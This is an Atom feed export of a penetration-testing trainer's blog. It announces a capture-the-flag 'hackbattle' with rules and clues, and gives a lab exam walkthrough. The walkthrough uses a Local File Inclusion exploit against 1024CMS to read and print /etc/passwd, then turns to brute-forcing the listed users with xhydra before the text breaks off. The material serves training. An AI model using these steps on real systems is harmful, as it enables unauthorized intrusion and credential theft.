<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6760447586854804036</id><updated>2012-02-13T13:25:30.897+03:00</updated><category term='Kenyan Security Maillist'/><category term='research'/><title type='text'>chuks corner</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>72</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3307821920464207456</id><published>2012-02-13T13:07:00.002+03:00</published><updated>2012-02-13T13:25:30.916+03:00</updated><title type='text'>HINTS ABOUT PREHACKBATTLE</title><content type='html'>Lately we did set up a pre-hackbattle, which is supposed to end on 14th Feb 2012. I have given the participants clues and hints on breaking into this infrastructure on my tweeter feed, @chuksjonia, see also the tag, #hackbattle&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-lszz5KBjOqk/Tzjk_ngmGoI/AAAAAAAAAk0/zHmeLsm57ls/s1600/hckx.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 128px; height: 170px;" src="http://3.bp.blogspot.com/-lszz5KBjOqk/Tzjk_ngmGoI/AAAAAAAAAk0/zHmeLsm57ls/s400/hckx.jpg" alt="" id="BLOGGER_PHOTO_ID_5708564309280692866" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;See as below.&lt;br /&gt;&lt;br /&gt;1.  clue number 1, jenniffer.kimari at gmail dot com&lt;br /&gt;2. clue number 2, Q: do you do backups? A: Yes sir, mysqldump!&lt;br /&gt;3. clue number 3,  scholastika.muraguri at gmail dot com&lt;br /&gt;4. clue number 4, best flaw, top 5 2007 OWASP&lt;br /&gt;&lt;br /&gt;Clue number five should be published by 14th Feb in the morning. Now what i have learned is that most of the pentesters in KE rely a lot on tools. &lt;span style="color: rgb(204, 0, 0); font-weight: bold;"&gt;PENTEST IS NEVER AUTOMATED.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;So a lot of participants are really rushing into breaking in, which is where they are loosing control. Am finding other people scanning up the webapps, others bruteforcing and they lack the idea of the infrastructure.&lt;br /&gt;&lt;br /&gt;I needed everyone who is doing this game to think like a blackhat, this game is a Covert forensics surveillance. So what happens if an Agency asks you to do such a job for them, do you start scanning, or do you learn the target first?&lt;br /&gt;&lt;br /&gt;One thing i would like to clarify is take your time, open one screen to be running a movie beside you, don't rush. Take naps when you  do this, get ideas, understand how the admin and the developer created the infrastructure. Learn the OS the server is running, do threat intelligence as much as you can about the application.&lt;br /&gt;&lt;br /&gt;Don't start shooting in a dagger fight. So its around 36 hrs remaining until we get a winner, which i hope we find soon.&lt;br /&gt;&lt;br /&gt;Good luck to all playing, and we meet at the finish line.&lt;br /&gt;&lt;br /&gt;./Chucks&lt;br /&gt;&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3307821920464207456?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3307821920464207456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3307821920464207456' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3307821920464207456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3307821920464207456'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2012/02/hints-about-prehackbattle.html' title='HINTS ABOUT PREHACKBATTLE'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-lszz5KBjOqk/Tzjk_ngmGoI/AAAAAAAAAk0/zHmeLsm57ls/s72-c/hckx.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4971830688462637576</id><published>2012-02-09T15:46:00.003+03:00</published><updated>2012-02-09T15:54:00.932+03:00</updated><title type='text'>PRE-HACKBATTLE PRONON00B</title><content type='html'>Pre-hackbattle set to start 0000hrs Friday 10th, and this will open up the gates for later battle this year.&lt;br /&gt;&lt;br /&gt;Currently we don't have many contestants, but we will work with what we have.&lt;br /&gt;&lt;br /&gt;We are like 11 hrs to go before we start, and we should have some results by 14th of February.&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;&lt;br /&gt;./Chucks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4971830688462637576?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4971830688462637576/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4971830688462637576' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4971830688462637576'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4971830688462637576'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2012/02/pre-hackbattle-pronon00b.html' title='PRE-HACKBATTLE PRONON00B'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3006226980065194310</id><published>2012-02-06T13:14:00.004+03:00</published><updated>2012-02-06T13:48:22.970+03:00</updated><title type='text'>PRE-HACKBATTLE CODENAME -ProofNoN00b</title><content type='html'>So we are starting the pre-hackbattle this week and we are still waiting for registrations from members of Security Forum, though its taking long. We are expecting to start on 10th of this February, and we should be able to announce the winners by 14th this Feb.&lt;br /&gt;&lt;br /&gt;Competitors will be expected to send 500/- bob on Mpesa to &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-N3Lhx-0RS2Q/Ty-vQDXvQoI/AAAAAAAAAkE/qGot6xxpUu8/s1600/hacker1.jpg"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 197px; height: 216px;" src="http://1.bp.blogspot.com/-N3Lhx-0RS2Q/Ty-vQDXvQoI/AAAAAAAAAkE/qGot6xxpUu8/s400/hacker1.jpg" alt="" id="BLOGGER_PHOTO_ID_5705971943219348098" border="0" /&gt;&lt;/a&gt;Kennedy&lt;br /&gt;Kasina, 0720-269-850, to register for the competition. An email with&lt;br /&gt;the IPs will be sent via email to the registered members.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The funds collected will be used to pay for the infrastructure since we don't have sponsorship, the servers bought for this came straight from my pocket. Extra amount, we are thinking of giving it to Children Home around Nairobi.&lt;br /&gt;&lt;br /&gt;Rules:&lt;br /&gt;&lt;br /&gt;1. Any personnel involved with the infrastructure set up will be&lt;br /&gt;disqualified for the contest&lt;br /&gt;2. Every registered competitor will be needed to have a full report of&lt;br /&gt;his actions&lt;br /&gt;3. Any changes of the major file to mess up with the checksum, will be&lt;br /&gt;considered as a disqualification.&lt;br /&gt;4. Any type of DOS will have your IPs blocked&lt;br /&gt;5. Teamwork is allowed.&lt;br /&gt;6. Winners will have to show how they hacked on major hackbattle later&lt;br /&gt;this year.&lt;br /&gt;7. The registration will only be allowed from EAC members.&lt;br /&gt;8. Trying to social engineer moderators will be considered as a cool :)&lt;br /&gt;9. How to win, hack the infrastructure the fastest&lt;br /&gt;&lt;br /&gt;Remember, &lt;span style="color: rgb(255, 0, 0);"&gt;ANY ACTIONS OUTSIDE OF THESE RULES WILL RESULT IN DISQUALIFICATION.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3006226980065194310?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3006226980065194310/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3006226980065194310' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3006226980065194310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3006226980065194310'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2012/02/so-we-are-starting-pre-hackbattle-this.html' title='PRE-HACKBATTLE CODENAME -ProofNoN00b'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-N3Lhx-0RS2Q/Ty-vQDXvQoI/AAAAAAAAAkE/qGot6xxpUu8/s72-c/hacker1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-8869380865948112344</id><published>2011-11-27T11:06:00.003+03:00</published><updated>2011-11-27T11:21:33.012+03:00</updated><title type='text'>One more Pentest LAB before end of Year</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-dAgEhYoMM7c/TtHx2c4jPXI/AAAAAAAAAis/NXA6LmYzMnM/s1600/Endofyearexam.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 276px;" src="http://4.bp.blogspot.com/-dAgEhYoMM7c/TtHx2c4jPXI/AAAAAAAAAis/NXA6LmYzMnM/s400/Endofyearexam.jpg" alt="" id="BLOGGER_PHOTO_ID_5679586522859519346" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;I got another privilege to set up another exam and where there were two servers this time on the WAN, with one firewalling or filtering traffic to the main Box. The main had a DB and an Apache server, and other services like sshd and ftpd. This Server as per recon, it was mean for  FileService/Databases.&lt;br /&gt;&lt;br /&gt;So above is simulation of the Network. I will soon be posting on how this infrastructure would have been compromised.&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-8869380865948112344?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/8869380865948112344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=8869380865948112344' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8869380865948112344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8869380865948112344'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/11/one-more-pentest-lab-before-end-of-year.html' title='One more Pentest LAB before end of Year'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-dAgEhYoMM7c/TtHx2c4jPXI/AAAAAAAAAis/NXA6LmYzMnM/s72-c/Endofyearexam.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-9082999007032236420</id><published>2011-11-14T11:15:00.033+03:00</published><updated>2011-11-24T14:30:25.185+03:00</updated><title type='text'>One of the exams i had set this October 2011</title><content type='html'>The other day i was training EN1 and 2 and i had to set an exam that would cover much of what the student had learnt. So here it goes. The trick to passing the exam is what we call Threat Intelligence. Alot of pentesters out there have no idea how to do it, so i had found it important for my students to have a glimpse of what they are expected to do when they get back to their organizations.&lt;br /&gt;&lt;br /&gt;First of all, the most important part of the Assessment is reconassaince.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-EpGvIWOFilw/TsDPtqu7sEI/AAAAAAAAAfo/Pc9mDpFbk_I/s1600/nmap.jpg"&gt;&lt;img style="cursor: pointer; width: 567px; height: 276px;" src="http://4.bp.blogspot.com/-EpGvIWOFilw/TsDPtqu7sEI/AAAAAAAAAfo/Pc9mDpFbk_I/s400/nmap.jpg" alt="" id="BLOGGER_PHOTO_ID_5674763913959026754" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Reconnaissance gives you a chance to get more information about the target and from here we start understanding the OS version, and what is running on the system. As you can see, we have port 80 open with Apache running on it. So lets load the website on our browser and see what we can view.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-xjqcvEQN3nU/TsDR1zjHcWI/AAAAAAAAAf0/8SmTxat78Ps/s1600/checkport80.jpg"&gt;&lt;img style="cursor: pointer; width: 446px; height: 327px;" src="http://1.bp.blogspot.com/-xjqcvEQN3nU/TsDR1zjHcWI/AAAAAAAAAf0/8SmTxat78Ps/s400/checkport80.jpg" alt="" id="BLOGGER_PHOTO_ID_5674766252787593570" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So we get to see we have a website running on this server, we can try login or even check it out, or even scan it with nikto which is located in /pentest/web/nikto in BackTrack.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-KRCXx7DwIFw/TsDTdnBXgYI/AAAAAAAAAgA/6Pc-Qoar-Hk/s1600/niktoscan.jpg"&gt;&lt;img style="cursor: pointer; width: 478px; height: 224px;" src="http://4.bp.blogspot.com/-KRCXx7DwIFw/TsDTdnBXgYI/AAAAAAAAAgA/6Pc-Qoar-Hk/s400/niktoscan.jpg" alt="" id="BLOGGER_PHOTO_ID_5674768036131209602" border="0" /&gt;&lt;/a&gt;Nikto gives us more information about the website and we get find some urls which are good for understanding the version of the webapp, license.txt and also some info disclosure via test.php as seen below.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-3MdCIurVon0/TsDf9nCusNI/AAAAAAAAAgM/4x1LNUvWLXw/s1600/interesting-file.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 150px;" src="http://3.bp.blogspot.com/-3MdCIurVon0/TsDf9nCusNI/AAAAAAAAAgM/4x1LNUvWLXw/s400/interesting-file.jpg" alt="" id="BLOGGER_PHOTO_ID_5674781780032270546" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-pBcTtg96Jlw/TsDgcl3fl7I/AAAAAAAAAgY/FUJCSxygFYM/s1600/versionof_cms.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 120px;" src="http://4.bp.blogspot.com/-pBcTtg96Jlw/TsDgcl3fl7I/AAAAAAAAAgY/FUJCSxygFYM/s400/versionof_cms.jpg" alt="" id="BLOGGER_PHOTO_ID_5674782312292652978" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-ozhEC6xQBgM/TsDh_6pdPuI/AAAAAAAAAgw/NFj-VkZzrYU/s1600/pathtowebroot.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 91px;" src="http://3.bp.blogspot.com/-ozhEC6xQBgM/TsDh_6pdPuI/AAAAAAAAAgw/NFj-VkZzrYU/s400/pathtowebroot.jpg" alt="" id="BLOGGER_PHOTO_ID_5674784018677972706" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-E0aJLi-FAkw/TsDg2gzMoqI/AAAAAAAAAgk/HXaecI4iG7w/s1600/test.php1.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 664px; height: 166px;" src="http://1.bp.blogspot.com/-E0aJLi-FAkw/TsDg2gzMoqI/AAAAAAAAAgk/HXaecI4iG7w/s400/test.php1.jpg" alt="" id="BLOGGER_PHOTO_ID_5674782757609054882" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So, by now we know that the OS is Linux and also we know the host name and the path to which the website is, the Apache version and also the php version. We do also know the exact version of the kernel running. We were also able to pick the version and the type of the web application which is called 1024CMS.&lt;br /&gt;&lt;br /&gt;Now we need to do Threat Intelligence against the target running 1024CMS, and we visit exploit db website.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-pzmEBeq-KIc/TsYuMG_nMXI/AAAAAAAAAg8/yMayFleCdBU/s1600/threatintelligence_on_explotdb.jpg"&gt;&lt;img style="cursor: pointer; width: 559px; height: 404px;" src="http://4.bp.blogspot.com/-pzmEBeq-KIc/TsYuMG_nMXI/AAAAAAAAAg8/yMayFleCdBU/s400/threatintelligence_on_explotdb.jpg" alt="" id="BLOGGER_PHOTO_ID_5676275165917819250" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And we search for 1024cms in exploitdb database and you should find as below.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-S7pcwXcAGQU/TsYw6Bh5MfI/AAAAAAAAAhI/LM3elCpNqMQ/s1600/several_expoits.jpg"&gt;&lt;img style="cursor: pointer; width: 438px; height: 312px;" src="http://2.bp.blogspot.com/-S7pcwXcAGQU/TsYw6Bh5MfI/AAAAAAAAAhI/LM3elCpNqMQ/s400/several_expoits.jpg" alt="" id="BLOGGER_PHOTO_ID_5676278153748230642" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So lets go ahead and open the first exploit we have on the exploit-db website and see if it will run on the Target box.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-rOvy02_mTg8/TsYyRkpMD6I/AAAAAAAAAhU/g5jKwf3jpUA/s1600/exploittouse.jpg"&gt;&lt;img style="cursor: pointer; width: 409px; height: 253px;" src="http://3.bp.blogspot.com/-rOvy02_mTg8/TsYyRkpMD6I/AAAAAAAAAhU/g5jKwf3jpUA/s400/exploittouse.jpg" alt="" id="BLOGGER_PHOTO_ID_5676279657822687138" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;As you can see, this vulnerability exploits a a flaw in code called Local File Inclusion, which is common on LAMP systems. With this we can download any file on the system that we have access to. One of the file interesting files is /etc/passwd and so we try to download from the box via the vulnerability as seen below.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-ATXea8mXE5I/TsY0WhnuqZI/AAAAAAAAAhg/bRLsMMDXkPE/s1600/exploit2.jpg"&gt;&lt;img style="cursor: pointer; width: 346px; height: 206px;" src="http://1.bp.blogspot.com/-ATXea8mXE5I/TsY0WhnuqZI/AAAAAAAAAhg/bRLsMMDXkPE/s400/exploit2.jpg" alt="" id="BLOGGER_PHOTO_ID_5676281941933861266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;As above you can see we are able to download the /etc/passwd and now we have a list of users for this box, as seen below;&lt;br /&gt;# cat passwd&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;root:x:0:0:root:/root:/bin/bash&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;bin:x:1:1:bin:/bin:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;daemon:x:2:2:daemon:/sbin:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;adm:x:&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;3:&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;4&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;:adm:/var/adm:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;sync:x:5:0:sync:/sbin:/bin/sync&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;halt:x:7:0:halt:/sbin:/sbin/halt&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;mail:x:8:12:mail:/var/spool/mail:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;new&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;s:x:9:13:&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;news:/etc/news:&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;operator:x:11:0:operator:/root:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;games:x:12:100:games:/usr/games:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;gopher:x:13:30:gopher:/var/gopher:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;nobody:x:99:99:Nobody:/:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;apache:x:48:48:Apache:/var/www:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;r&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;pc:x:3&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;2:32:Portmapper RPC user:/:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;nfsnobody:x:65534:65534:Anonymous NFS User:/var/li&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;b/nfs:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;sm&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;msp:x:51:51::/var/spool/mqueue:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;distcache:x:94:94:Distcache:/:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;nscd:x:28:28:NSCD Daemon:/:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;vcsa&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;:x:6&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;9:69:virtual console memory owner:/dev:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;sshd:x:74:74:Privilege-separated SSH:/va&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;r/empty/sshd:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;squid:x:23:23::/var/spool/squid:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;pcap:x:77:77::/var/arpwatch:/sbin&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;ntp:x:38:38::/etc/ntp:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;dbus:x:81:81:System message bus:/:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;haldaemon:x:68:68:HAL daemon:/:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;ava&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;h&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;i:x:70:70:Avahi daemon:/:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;named:x:25:25:Named:/var/named&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;gdm:x:42:42::/var/gdm:/sbin/nologin&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;webmaster:x:501:501::/home/webmaster:/bin/bash&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;webadmin:x:502:502::/home/webadmin:/bin/bas&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;h&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;michele:x:503:503::/home/michele:/bin/bash&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;avant:x:504:504::/home/avant:/bin/bash&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;oscar:x:505:505::/home/oscar:/bin/bash&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now with the users we can start bruteforcing for their passwords from our password list, or rather the wordlist and we use xhydra.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-2HFOB_-yJNM/TsY2Tvx9HwI/AAAAAAAAAhs/ZXp35zhZSEw/s1600/bruteforce.jpg"&gt;&lt;img style="cursor: pointer; width: 509px; height: 225px;" 